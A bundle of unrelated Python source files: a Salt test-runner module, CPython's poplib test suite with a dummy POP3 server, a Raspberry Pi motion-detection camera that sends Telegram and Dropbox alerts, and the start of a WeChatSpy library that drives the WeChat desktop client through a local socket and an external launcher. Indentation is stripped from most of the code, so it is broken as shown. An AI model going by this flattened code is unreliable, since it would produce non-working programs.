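    print(urllib.request.urlopen(url).read().decode('utf-8'))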
|
mc_test.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
'''
.. _module_mc_test:
mc_test
===============================================
'''
import threading
import time
import Queue
import os
import traceback
import salt.exceptions
import salt.output
from salt.utils.odict import OrderedDict
from mc_states import api
from mc_states import saltapi
from mc_states.tests import utils
class TestError(salt.exceptions.SaltException):
"""."""
def _error(msg, ret=None):
return saltapi.rich_error(TestError, msg, ret)
def froot():
return __opts__['file_roots']['base'][0]
def mroot():
return os.path.join(froot(), 'makina-states')
def lint_tests(use_vt=True, logcapture=True):
try:
result = __salt__['cmd.run_all'](
'_scripts/pylint.sh -f colorized mc_states',
use_vt=use_vt, cwd=mroot())
if result['retcode']:
raise _error('Pylint tests failed', result)
except salt.exceptions.CommandExecutionError:
trace = traceback.format_exc()
raise _error('Problem with pylint install:\n {0}'.format(
api.magicstring(trace)))
def unit_tests(tests=None,
coverage=True,
doctests=True,
use_vt=True,
logcapture=True):
in_args = '--exe -e mc_test -v -s'
if not logcapture:
in_args += ' --nologcapture'
if isinstance(tests, basestring):
tests = tests.split(',')
if not tests:
tests = ['mc_states']
if coverage:
in_args += (' --with-xcoverage'
' --xcoverage-file=.coverage.xml')
if doctests:
in_args += ' --with-doctest'
failed = OrderedDict()
success = OrderedDict()
for test in tests:
try:
cmd = 'bin/nosetests {0} {1}'.format(
in_args, test)
result = __salt__['cmd.run_all'](
cmd,
output_loglevel='debug',
use_vt=use_vt, cwd=mroot())
if result['retcode']:
failed[test] = result
else:
success[test] = result
except salt.exceptions.CommandExecutionError:
trace = traceback.format_exc()
raise _error('Problem with nose install:\n {0}'.format(
api.magicstring(trace)))
if failed:
fail = failed.pop([a for a in failed][0])
for ffail in failed:
fail = saltapi.concat_res_or_rets(fail, ffail)
raise _error('Doctest tests failed', fail)
return success
def _echo(inq, outq):
stop = False
while not stop:
try:
test = inq.get_nowait() == 'STOP'
if test:
print('OK baby, finished !')
stop = True
continue
except Queue.Empty:
pass
if int(time.time()) % 50 == 0:
print('STATUS ECHO running...')
time.sleep(1)
def run_tests(flavors=None, use_vt=True, echo=False, logcapture=True):
if not flavors:
flavors = []
if isinstance(flavors, basestring):
flavors = flavors.split(',') # pylint: disable=E1101
success = OrderedDict()
failures = OrderedDict()
# for step in ['lint', 'unit']:
if echo:
inq = Queue.Queue()
outq = Queue.Queue()
pr = threading.Thread(target=_echo, args=(inq, outq))
pr.start()
for step in ['unit']:
try:
utils.test_setup()
success[step] = __salt__['mc_test.{0}_tests'.format(
step)](use_vt=use_vt, logcapture=logcapture)
except (TestError,) as exc:
failures[step] = exc
except (Exception, KeyboardInterrupt):
failures[step] = traceback.format_exc()
break
finally:
utils.test_teardown()
if echo:
inq.put('STOP')
pr.join()
# for now, lint is not a failure
acceptables = ['lint']
for i in acceptables:
failures.pop(i, None)
if failures:
_failures = dict([(a, "{0}".format(failures[a])) for a in failures])
salt.output.display_output(_failures, opts=__opts__)
raise TestError('test failure => non 0 exit code')
# if no failure, be sure not to mark retcode as a failure
__context__['retcode'] = 0
return success
def run_travis_tests(use_vt=False, echo=True, logcapture=False):
use_vt = True
return run_tests(
'travis', use_vt=use_vt, echo=echo, logcapture=logcapture)
# vim:set et sts=4 ts=4 tw=80:
|
test_poplib.py
|
"""Test script for poplib module."""
# Modified by Giampaolo Rodola' to give poplib.POP3 and poplib.POP3_SSL
# a real test suite
import poplib
import asyncore
import asynchat
import socket
import os
import time
import errno
from unittest import TestCase
from test import support as test_support
threading = test_support.import_module('threading')
HOST = test_support.HOST
PORT = 0
# the dummy data returned by server when LIST and RETR commands are issued
LIST_RESP = b'1 1\r\n2 2\r\n3 3\r\n4 4\r\n5 5\r\n.\r\n'
RETR_RESP = b"""From: postmaster@python.org\
\r\nContent-Type: text/plain\r\n\
MIME-Version: 1.0\r\n\
Subject: Dummy\r\n\
\r\n\
line1\r\n\
line2\r\n\
line3\r\n\
.\r\n"""
class DummyPOP3Handler(asynchat.async_chat):
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
self.set_terminator(b"\r\n")
self.in_buffer = []
self.push('+OK dummy pop3 server ready. <timestamp>')
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = b''.join(self.in_buffer)
line = str(line, 'ISO-8859-1')
self.in_buffer = []
cmd = line.split(' ')[0].lower()
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('-ERR unrecognized POP3 command "%s".' %cmd)
def handle_error(self):
raise
def push(self, data):
asynchat.async_chat.push(self, data.encode("ISO-8859-1") + b'\r\n')
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_user(self, arg):
if arg != "guido":
self.push("-ERR no such user")
self.push('+OK password required')
def cmd_pass(self, arg):
if arg != "python":
self.push("-ERR wrong password")
self.push('+OK 10 messages')
def cmd_stat(self, arg):
self.push('+OK 10 100')
def cmd_list(self, arg):
if arg:
self.push('+OK %s %s' %(arg, arg))
else:
self.push('+OK')
asynchat.async_chat.push(self, LIST_RESP)
cmd_uidl = cmd_list
def cmd_retr(self, arg):
self.push('+OK %s bytes' %len(RETR_RESP))
asynchat.async_chat.push(self, RETR_RESP)
cmd_top = cmd_retr
def cmd_dele(self, arg):
self.push('+OK message marked for deletion.')
def cmd_noop(self, arg):
self.push('+OK done nothing.')
def cmd_rpop(self, arg):
self.push('+OK done nothing.')
def cmd_apop(self, arg):
self.push('+OK done nothing.')
def cmd_quit(self, arg):
self.push('+OK closing.')
self.close_when_done()
class DummyPOP3Server(asyncore.dispatcher, threading.Thread):
handler = DummyPOP3Handler
def __init__(self, address, af=socket.AF_INET):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
self.handler_instance = None
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
while self.active and asyncore.socket_map:
self.active_lock.acquire()
asyncore.loop(timeout=0.1, count=1)
self.active_lock.release()
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accepted(self, conn, addr):
self.handler_instance = self.handler(conn)
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise
class TestPOP3Class(TestCase):
def assertOK(self, resp):
self.assertTrue(resp.startswith(b"+OK"))
def setUp(self):
self.server = DummyPOP3Server((HOST, PORT))
self.server.start()
self.client = poplib.POP3(self.server.host, self.server.port, timeout=3)
def tearDown(self):
self.client.close()
self.server.stop()
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(),
b'+OK dummy pop3 server ready. <timestamp>')
def test_exceptions(self):
self.assertRaises(poplib.error_proto, self.client._shortcmd, 'echo -err')
def test_user(self):
self.assertOK(self.client.user('guido'))
self.assertRaises(poplib.error_proto, self.client.user, 'invalid')
def test_pass_(self):
self.assertOK(self.client.pass_('python'))
self.assertRaises(poplib.error_proto, self.client.user, 'invalid')
def test_stat(self):
self.assertEqual(self.client.stat(), (10, 100))
def test_list(self):
self.assertEqual(self.client.list()[1:],
([b'1 1', b'2 2', b'3 3', b'4 4', b'5 5'],
25))
self.assertTrue(self.client.list('1').endswith(b"OK 1 1"))
def test_retr(self):
expected = (b'+OK 116 bytes',
[b'From: postmaster@python.org', b'Content-Type: text/plain',
b'MIME-Version: 1.0', b'Subject: Dummy',
b'', b'line1', b'line2', b'line3'],
113)
foo = self.client.retr('foo')
self.assertEqual(foo, expected)
def test_dele(self):
self.assertOK(self.client.dele('foo'))
def test_noop(self):
self.assertOK(self.client.noop())
def test_rpop(self):
self.assertOK(self.client.rpop('foo'))
def test_apop(self):
self.assertOK(self.client.apop('foo', 'dummypassword'))
def test_top(self):
expected = (b'+OK 116 bytes',
[b'From: postmaster@python.org', b'Content-Type: text/plain',
b'MIME-Version: 1.0', b'Subject: Dummy', b'',
b'line1', b'line2', b'line3'],
113)
self.assertEqual(self.client.top(1, 1), expected)
def test_uidl(self):
self.client.uidl()
self.client.uidl('foo')
def test_quit(self):
resp = self.client.quit()
self.assertTrue(resp)
self.assertIsNone(self.client.sock)
self.assertIsNone(self.client.file)
SUPPORTS_SSL = False
if hasattr(poplib, 'POP3_SSL'):
import ssl
SUPPORTS_SSL = True
CERTFILE = os.path.join(os.path.dirname(__file__) or os.curdir, "keycert.pem")
class DummyPOP3_SSLHandler(DummyPOP3Handler):
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
ssl_socket = ssl.wrap_socket(self.socket, certfile=CERTFILE,
server_side=True,
do_handshake_on_connect=False)
self.del_channel()
self.set_socket(ssl_socket)
# Must try handshake before calling push()
self._ssl_accepting = True
self._do_ssl_handshake()
self.set_terminator(b"\r\n")
self.in_buffer = []
self.push('+OK dummy pop3 server ready. <timestamp>')
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
raise
except socket.error as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
DummyPOP3Handler.handle_read(self)
class TestPOP3_SSLClass(TestPOP3Class):
# repeat previous tests by using poplib.POP3_SSL
def setUp(self):
self.server = DummyPOP3Server((HOST, PORT))
self.server.handler = DummyPOP3_SSLHandler
self.server.start()
self.client = poplib.POP3_SSL(self.server.host, self.server.port)
def test__all__(self):
self.assertIn('POP3_SSL', poplib.__all__)
def test_context(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, keyfile=CERTFILE, context=ctx)
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, certfile=CERTFILE, context=ctx)
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, keyfile=CERTFILE,
certfile=CERTFILE, context=ctx)
self.client.quit()
self.client = poplib.POP3_SSL(self.server.host, self.server.port,
context=ctx)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.assertIs(self.client.sock.context, ctx)
self.assertTrue(self.client.noop().startswith(b'+OK'))
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(60) # Safety net. Look issue 11812
self.port = test_support.bind_port(self.sock)
self.thread = threading.Thread(target=self.server, args=(self.evt,self.sock))
self.thread.setDaemon(True)
self.thread.start()
self.evt.wait()
def tearDown(self):
self.thread.join()
del self.thread # Clear out any dangling Thread objects.
def server(self, evt, serv):
serv.listen(5)
evt.set()
try:
conn, addr = serv.accept()
conn.send(b"+ Hola mundo\n")
conn.close()
except socket.timeout:
pass
finally:
serv.close()
def testTimeoutDefault(self):
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
pop = poplib.POP3(HOST, self.port)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(pop.sock.gettimeout(), 30)
pop.sock.close()
def testTimeoutNone(self):
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
pop = poplib.POP3(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertTrue(pop.sock.gettimeout() is None)
pop.sock.close()
def testTimeoutValue(self):
pop = poplib.POP3(HOST, self.port, timeout=30)
self.assertEqual(pop.sock.gettimeout(), 30)
pop.sock.close()
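# Editor's illustration (a minimal sketch, not part of the test suite): the client-side
# poplib calls these tests exercise, shown as one self-contained session helper. Host,
# port and credentials are placeholders for a real POP3 server.
def example_pop3_session(host, port, user, password):
    pop = poplib.POP3(host, port, timeout=30)
    try:
        pop.user(user)
        pop.pass_(password)
        return pop.stat()  # (message count, mailbox size in octets)
    finally:
        pop.quit()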
def test_main():
tests = [TestPOP3Class, TestTimeouts]
if SUPPORTS_SSL:
tests.append(TestPOP3_SSLClass)
thread_info = test_support.threading_setup()
try:
test_support.run_unittest(*tests)
finally:
test_support.threading_cleanup(*thread_info)
if __name__ == '__main__':
test_main()
|
pi_surveillance.py
|
import RPi.GPIO as GPIO
import os
import threading
import emoji
import json
import dropbox
from telegram.ext import CommandHandler, Updater, MessageHandler, Filters
import time
import datetime
import argparse
import warnings
from pyimagetemp.tempimage import TempImage
from picamera.array import PiRGBArray
from picamera import PiCamera
import imutils
import cv2
cmd_ls = "1) /start "+emoji.emojize(':key:')+": Nothing, just a Hi.\n 2) /help "+emoji.emojize(':warning:')+": List of available command(s)\n 3) /subscribe "+emoji.emojize(':memo:')+": Subscribe to motion alerts.\n 4) /unsubscribe "+emoji.emojize(':electric_plug:')+": Unsubscribe to motion alerts.\n 5) /update "+emoji.emojize(':bell:')+": Toggle image feed alert\n 6) /alarm :Enable/disable alarm"
alarm_status = None
update_status = False
# construct arg parser
ap = argparse.ArgumentParser()
ap.add_argument("-c", "--conf", required=True,
help="path to JSON configuration file")
ap.add_argument("-s", "--subs", required=True,
help="path to JSON subscriber list file")
args = vars(ap.parse_args())
# filter warning and load config
warnings.filterwarnings("ignore")
conf = json.load(open(args["conf"]))
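# Editor's note (a hedged sketch of the expected --conf JSON): every key below is read
# somewhere in this script; the values are placeholders only.
# {
#     "telegram_access_token": "<bot token>",
#     "reboot_access_token": 0,
#     "use_dropbox": false,
#     "dropbox_access_token": "<dropbox token>",
#     "dropbox_base_path": "surveillance",
#     "relay-0": 17,
#     "show_video": false,
#     "resolution": [640, 480],
#     "fps": 16,
#     "camera_warmup_time": 2.5,
#     "delta_thresh": 5,
#     "min_area": 5000,
#     "min_upload_seconds": 3.0,
#     "min_motion_frames": 8
# }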
client = Updater(token=conf["telegram_access_token"], use_context=True)
db_client = None
# check to see if the Dropbox should be used
if conf["use_dropbox"]:
# connect to dropbox and start the session authorization process
db_client = dropbox.Dropbox(conf["dropbox_access_token"])
print("[SUCCESS] dropbox account linked")
# init the GPIO
try:
GPIO.setmode(GPIO.BCM)
RELAY_1_GPIO = conf["relay-0"]
GPIO.setup(RELAY_1_GPIO, GPIO.OUT) # Assign Mode
GPIO.output(RELAY_1_GPIO, GPIO.LOW)
alarm_status = False
except:
print("GPIO init failed.")
def start(update, context):
context.bot.send_message(chat_id= update.effective_chat.id,
text="Hi, Welcome to Surveillance Alert Bot! /help for help or /subscribe and /update to begin receiving new feed. (Your ID is: {})".format(update.effective_user.id))
def unknown(update, context):
context.bot.send_message(chat_id= update.effective_chat.id,
text="Sorry, I didn't understand that. / Saya tidak faham")
def restart(update, context):
auth_id = update.effective_user.id
if conf["reboot_access_token"] == auth_id:
print("[WARN] Attempting to reboot!...")
context.bot.send_message(chat_id = update.effective_chat.id,
text="[NOTICE] Rebooting my core system... See you later!")
time.sleep(3)
threading.Thread(target=shutdown).start()
else:
print("[WARN] Unauthorize request!")
context.bot.send_message(chat_id = update.effective_chat.id,
text="[???] How did you know about this command?")
def shutdown():
try:
client.stop()
client.is_idle = False
os.system('sudo shutdown -r now')
except:
print("Something not right when attempting to reboot.")
def help(update, context):
auth_id = update.effective_user.id
context.bot.send_message(chat_id= update.effective_chat.id,
text="Available Commands:\n{}".format(cmd_ls))
if conf["reboot_access_token"] == auth_id:
context.bot.send_message(chat_id= update.effective_chat.id,
text="[PRIVATE] /restart: To reboot bot and its core systems")
def alarm(update, context):
global alarm_status
    # check the alarm status: if enabled, disable it, and vice versa
if alarm_status:
context.bot.send_message(chat_id= update.effective_chat.id,
text="Alarm has been turned off. /alarm to re-enable.")
GPIO.output(RELAY_1_GPIO,GPIO.HIGH)
alarm_status= False
print("[CONF] Alarm disabled.")
else:
context.bot.send_message(chat_id= update.effective_chat.id,
text="Triggering alarm... /alarm to disable.")
alarm_status= True
GPIO.output(RELAY_1_GPIO,GPIO.LOW)
print("[CONF] Alarm enabled.")
def update(update, context):
global update_status
    # check whether update alerts are enabled or disabled
if update_status:
context.bot.send_message(chat_id= update.effective_chat.id,
text="Update has been disabled! /update to keep receiving new feed.")
update_status=False
print("[CONF] Update disabled.")
else:
context.bot.send_message(chat_id= update.effective_chat.id,
text="Update has been enabled! /update to stop any new feed.")
update_status=True
print("[CONF] Update enabled.")
def subscribe(update, context):
# check if user id exist
user_id = update.effective_user.id
exist = False
present = False
with open(args["subs"],'r') as f:
subs = json.load(f)
print("[INFO] Current subs - {}".format(subs))
if "subscribers" in subs:
exist = True
for s in subs["subscribers"]:
if user_id in s.values():
context.bot.send_message(chat_id= update.effective_chat.id,
text="You already subscribed! /unsubscribe to stop")
present = True
break
if not exist:
subs = {}
subs['subscribers'] = []
with open(args["subs"], 'w') as wr:
x = json.dumps(subs, indent=4)
wr.write(x + '\n')
if not present:
name = update.effective_user.first_name
subs['subscribers'].append({"user_name": name, "user_id": user_id})
print("[INFO] Subscribing with data: name={}, user_data={}".format(name, user_id))
print("[INFO] New subscribers list: {}".format(subs))
with open(args["subs"], 'w') as wr:
x = json.dumps(subs, indent=4)
wr.write(x + '\n')
context.bot.send_message(chat_id= update.effective_chat.id,
text="You have been subscribed to new alerts!".format(update.effective_user.id))
def unsubscribe(update, context):
user_id = update.effective_user.id
exist=False
status=False
entry_key=-1
sel = 0
with open(args["subs"], 'r') as f:
subs = json.load(f)
if 'subscribers' in subs:
exist=True
for entry in subs['subscribers']:
if entry['user_id'] == 'id':
pass
elif entry['user_id'] == user_id:
status=True
entry_key = sel
name = entry['user_name']
id = entry['user_id']
print("[INFO] user_id found with name: {} at entry {}.".format(name,sel))
sel=sel+1
if not status:
context.bot.send_message(chat_id= update.effective_chat.id,
text="You did not subscribed to any alerts. /subscribe")
if not exist:
subs = {}
subs['subscribers']= []
subs['subscribers'].append({"user_name": "user_id"})
with open(args["subs"], 'w') as wr:
x = json.dumps(subs, indent=4)
wr.write(x + '\n')
if status:
subs['subscribers'].pop(entry_key)
print("[INFO] Removed subscriber {} with id {}".format(name, id))
print("[INFO] Updated subscriber list: {}".format(subs))
with open(args["subs"], 'w') as wr:
x = json.dumps(subs, indent=4)
wr.write(x + '\n')
context.bot.send_message(chat_id= update.effective_chat.id,
text="You have been unsubscribed. /subscribe")
def update_to_user(chatid, img):
client.bot.send_message(chat_id= chatid,
text="Alert! Movement detected!! Sending image feed(s)... [/alarm]")
client.bot.send_photo(chat_id= chatid, photo=open(img,'rb'))
def main():
# load telegram client
dispatcher = client.dispatcher
unknown_handler = MessageHandler(Filters.command, unknown)
start_handler = CommandHandler('start', start)
subscribe_handler = CommandHandler('subscribe', subscribe)
unsubscribe_handler = CommandHandler('unsubscribe', unsubscribe)
restart_handler = CommandHandler('restart', restart)
help_handler = CommandHandler('help', help)
update_handler = CommandHandler('update',update)
alarm_handler = CommandHandler('alarm', alarm)
dispatcher.add_handler(start_handler)
dispatcher.add_handler(restart_handler)
dispatcher.add_handler(help_handler)
dispatcher.add_handler(update_handler)
dispatcher.add_handler(subscribe_handler)
dispatcher.add_handler(unsubscribe_handler)
dispatcher.add_handler(alarm_handler)
dispatcher.add_handler(unknown_handler)
print("[Notice] Bot is now online")
with open(args['subs'],'r') as f:
subs = json.load(f)
try:
if "subscribers" in subs:
for key in subs['subscribers']:
if key['user_name'] == 'name':
pass
else:
client.bot.send_message(chat_id=key['user_id'],
text="[Notice] Surveillance bot is now online!")
except:
print("[WARN] Subscriber {} may/had blocked the bot. Update the subscriber list!".format(key['user_name']))
client.start_polling()
th = threading.Thread(target=main, args=(), daemon=True)
th.start()
# openCV for pi_surveillance
# init the camera and grab a reference to the raw camera capture
camera = PiCamera()
camera.resolution = tuple(conf["resolution"])
camera.framerate = conf["fps"]
rawCapture = PiRGBArray(camera, size=tuple(conf["resolution"]))
# allow the camera to warm up, then init the average frame, last
# uploaded timestamp, and frame motion counter
print("[INFO] Warming up...")
time.sleep(conf["camera_warmup_time"])
avg = None
lastUploaded = datetime.datetime.now()
motionCounter = 0
# capture frames from the camera
for f in camera.capture_continuous(rawCapture, format="bgr", use_video_port=True):
# grab the raw NumPy array representing the image and init
# the timestamp and occupied/unoccupied text
frame = f.array
timestamp = datetime.datetime.now()
text = "Unoccupied"
# resize the frame, convert it to grayscale, and blur it
frame = imutils.resize(frame, width=500)
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
gray = cv2.GaussianBlur(gray, (21, 21), 0)
# if the average frame is none, init it
if avg is None:
print("[INFO] starting background model...")
avg = gray.copy().astype("float")
rawCapture.truncate(0)
continue
# accumulate the weighted average between the current frame and
# previous frames, then compute the differences between the current
# frame and running average
cv2.accumulateWeighted(gray, avg, 0.5)
frameDelta = cv2.absdiff(gray, cv2.convertScaleAbs(avg))
# threshold the delta image, dilate the thresholded image to fill
# in the holes then find contours on thresholded image
thresh = cv2.threshold(frameDelta, conf["delta_thresh"], 255,
cv2.THRESH_BINARY)[1]
thresh = cv2.dilate(thresh,None, iterations=2)
cnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE)
cnts = imutils.grab_contours(cnts)
# loop over contours
for c in cnts:
# if the contour is too small, ignore
if cv2.contourArea(c) < conf["min_area"]:
continue
# compute the bounding box for the contour, draw it on the
# frame, and then update the text
(x, y, w, h) = cv2.boundingRect(c)
cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)
text = "Occupied"
# draw the text and timestamp on the frame
ts = timestamp.strftime("%A %d %B %Y %I:%M:%S%p")
cv2.putText(frame, "Status: {}".format(text), (10,20),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)
cv2.putText(frame, ts, (10, frame.shape[0] - 10),
cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 255), 1)
# check to see if the room is occupied
if text == "Occupied":
# check to see if enough time has passed between uploads
if (timestamp - lastUploaded).seconds >= conf["min_upload_seconds"]:
# increment the motion counter
motionCounter +=1
# check to see if the number of frames with consistent motion
# is high enough
if motionCounter >= conf["min_motion_frames"]:
# check to see if telegram should be used
if update_status:
with open(args['subs'],'r') as f:
subs = json.load(f)
if "subscribers" in subs:
t = TempImage()
cv2.imwrite(t.path, frame)
for key in subs['subscribers']:
try:
if key['user_name'] == 'name':
pass
else:
update_to_user(key['user_id'],t.path)
print("[UPDATING] Uploading to {}".format(key['user_name']))
except:
print("[WARN] Subscriber {} may/had blocked the bot. Update the subscriber list!".format(key['user_name']))
t.cleanup()
if conf["use_dropbox"]:
# write the image to temporary file
t = TempImage()
cv2.imwrite(t.path, frame)
                    # upload the image to Dropbox and clean up the temporary image
print("[UPLOAD] {}".format(ts))
path = "/{base_path}/{timestamp}.jpg".format(
base_path=conf["dropbox_base_path"], timestamp=ts)
db_client.files_upload(open(t.path, "rb").read(), path)
t.cleanup()
# update the last uploaded timestamp
# and reset motion counter
lastUploaded = timestamp
motionCounter = 0
    # otherwise, the room is not occupied
else:
motionCounter = 0
# check to see if the frames should be displayed to screen
if conf["show_video"]:
# display the video feed
cv2.imshow("Security Feed", frame)
key = cv2.waitKey(1) & 0xFF
# if the 'q' key is pressed, break from the loop
if key == ord("q"):
print("[EXITING] Terminating other process...")
break
    # clear the stream in preparation for the next frame
rawCapture.truncate(0)
|
spy.py
|
from ast import literal_eval
import json
import os
from socket import socket, AF_INET, SOCK_STREAM
from threading import Thread
from time import sleep
from subprocess import Popen, PIPE
from .exceptions import handle_error_code
import logging
import warnings
import re
pattern = '[\u4e00-\u9fa5]'
formatter = logging.Formatter('%(asctime)s [%(threadName)s] %(levelname)s: %(message)s')
sh = logging.StreamHandler()
sh.setFormatter(formatter)
sh.setLevel(logging.DEBUG)
class WeChatSpy:
def __init__(self, parser=None, error_handle=None, multi=False, key=None):
self.logger = logging.getLogger(__file__)
self.logger.addHandler(sh)
self.logger.setLevel(logging.DEBUG)
        # TODO: exception handling callback
self.__error_handle = error_handle
        # whether multiple WeChat PC clients are allowed to run
self.__multi = multi
        # commercial license key
self.__key = key
        # callback for parsing data received over the socket
self.__parser = parser
self.__pid2client = {}
self.__socket_server = socket(AF_INET, SOCK_STREAM)
self.__socket_server.bind(("127.0.0.1", 9527))
self.__socket_server.listen(1)
t_start_server = Thread(target=self.__start_server)
t_start_server.daemon = True
t_start_server.name = "socket accept"
t_start_server.start()
def add_log_output_file(self, filename="spy.log", mode='a', encoding="utf8", delay=False, level="WARNING"):
fh = logging.FileHandler(filename, mode=mode, encoding=encoding, delay=delay)
if level.upper() == "DEBUG":
fh.setLevel(logging.DEBUG)
elif level.upper() == "INFO":
fh.setLevel(logging.INFO)
elif level.upper() == "WARNING":
fh.setLevel(logging.WARNING)
elif level.upper() == "ERROR":
fh.setLevel(logging.ERROR)
fh.setFormatter(formatter)
self.logger.addHandler(fh)
def __start_server(self):
while True:
socket_client, client_address = self.__socket_server.accept()
if self.__key:
data = json.dumps({"code": 9527, "key": self.__key})
data_length_bytes = int.to_bytes(len(data.encode(encoding="utf8")), length=4, byteorder="little")
socket_client.send(data_length_bytes + data.encode(encoding="utf8"))
t_socket_client_receive = Thread(target=self.receive, args=(socket_client, ))
t_socket_client_receive.name = f"client {client_address[1]}"
t_socket_client_receive.daemon = True
t_socket_client_receive.start()
def receive(self, socket_client):
data_str = ""
_data_str = None
while True:
try:
_data_str = socket_client.recv(4096).decode(encoding="utf8", errors="ignore")
except Exception as e:
for pid, client in self.__pid2client.items():
if client == socket_client:
self.__pid2client.pop(pid)
return self.logger.warning(f"A WeChat process (PID:{pid}) has disconnected: {e}")
else:
pid = "unknown"
return self.logger.warning(f"A WeChat process (PID:{pid}) has disconnected: {e}")
if _data_str:
data_str += _data_str
if data_str and data_str.endswith("*393545857*"):
for data in data_str.split("*393545857*"):
if data:
data = literal_eval(data)
if not self.__pid2client.get(data["pid"]) and data["type"] == 200:
self.__pid2client[data["pid"]] = socket_client
self.logger.info(f"A WeChat process (PID:{data['pid']}) successfully connected")
if callable(self.__parser):
self.__parser(data)
data_str = ""
def __send(self, data, pid):
if pid:
socket_client = self.__pid2client.get(pid)
else:
socket_client_list = list(self.__pid2client.values())
socket_client = socket_client_list[0] if socket_client_list else None
if socket_client:
data = json.dumps(data)
data_length_bytes = int.to_bytes(len(data.encode(encoding="utf8")), length=4, byteorder="little")
try:
socket_client.send(data_length_bytes + data.encode(encoding="utf8"))
except Exception as e:
for pid, v in self.__pid2client.items():
if v == socket_client:
self.__pid2client.pop(pid)
return self.logger.warning(f"A WeChat process (PID:{pid}) has disconnected: {e}")
else:
pid = "unknown"
return self.logger.warning(f"A WeChat process (PID:{pid}) has disconnected: {e}")
def run(self, background=False):
current_path = os.path.split(os.path.abspath(__file__))[0]
launcher_path = os.path.join(current_path, "Launcher.exe")
cmd_str = f"{launcher_path} multi" if self.__multi else launcher_path
p = Popen(cmd_str, shell=True, stdout=PIPE)
res_code, err = p.communicate()
res_code = res_code.decode()
handle_error_code(res_code)
if not background:
while True:
sleep(86400)
def query_contact_details(self, wxid, chatroom_wxid="", pid=None):
"""
查询联系人详情
:param wxid: 联系人wxid
:param chatroom_wxid:
:param pid:
"""
data = {"code": 2, "wxid": wxid, "chatroom_wxid": chatroom_wxid}
self.__send(data, pid)
def query_contact_list(self, step=50, pid=None):
"""
查询联系人详情
:param step: 每次回调的联系人列表长度
:param pid:
:return:
"""
data = {"code": 3, "step": step}
self.__send(data, pid)
def query_chatroom_member(self, wxid, pid=None):
"""
查询群成员列表
:param wxid: 群wxid
:param pid:
:return:
"""
data = {"code": 4, "wxid": wxid}
self.__send(data, pid)
def send_text(self, wxid, content, at_wxid="", pid=None):
"""
发送文本消息
:param wxid: 文本消息接收wxid
:param content: 文本消息内容
:param at_wxid: 如果wxid为群wxid且需要@群成员 此参数为被@群成员wxid,以英文逗号分隔
:param pid:
"""
if not wxid.endswith("chatroom"):
at_wxid = ""
data = {"code": 5, "wxid": wxid, "at_wxid": at_wxid, "content": content}
self.__send(data, pid)
def send_image(self, wxid, image_path, pid=None):
warnings.warn("The function 'send_image' is deprecated, and has been replaced by the function 'send_file'",
DeprecationWarning)
self.send_file(wxid, image_path, pid)
def send_file(self, wxid, file_path, pid=None):
"""
发送文件消息
:param wxid: 文件消息接收wxid
:param file_path: 文件路径
:param pid:
"""
if len(file_path.split("\\")) > 8:
return self.logger.warning(f"File path is too long: {file_path}")
if re.findall(pattern, file_path):
return self.logger.warning(f"Chinese characters are not allowed in file path: {file_path}")
data = {"code": 6, "wxid": wxid, "file_path": file_path}
self.__send(data, pid)
def accept_new_contact(self, encryptusername, ticket, pid=None):
"""
接受好友请求
:param encryptusername:
:param ticket:
:param pid:
:return:
"""
data = {"code": 7, "encryptusername": encryptusername, "ticket": ticket}
self.__send(data, pid)
def send_announcement(self, wxid, content, pid=None):
"""
发送群公共
:param wxid: 群wxid
:param content: 公告内容
:param pid:
:return:
"""
if not wxid.endswith("chatroom"):
return self.logger.warning("Can only send announcements to chatrooms")
data = {"code": 8, "wxid": wxid, "content": content}
self.__send(data, pid)
def create_chatroom(self, wxid, pid=None):
"""
创建群聊
:param wxid: wxid,以","分隔 至少需要两个
:param pid:
:return:
"""
if len(wxid.split(",")) < 2:
return self.logger.warning("This function requires at least two wxids separated by ','")
data = {"code": 9, "wxid": wxid}
self.__send(data, pid)
def share_chatroom(self, chatroom_wxid, wxid, pid=None):
"""
分享群聊邀请链接
:param chatroom_wxid:
:param wxid:
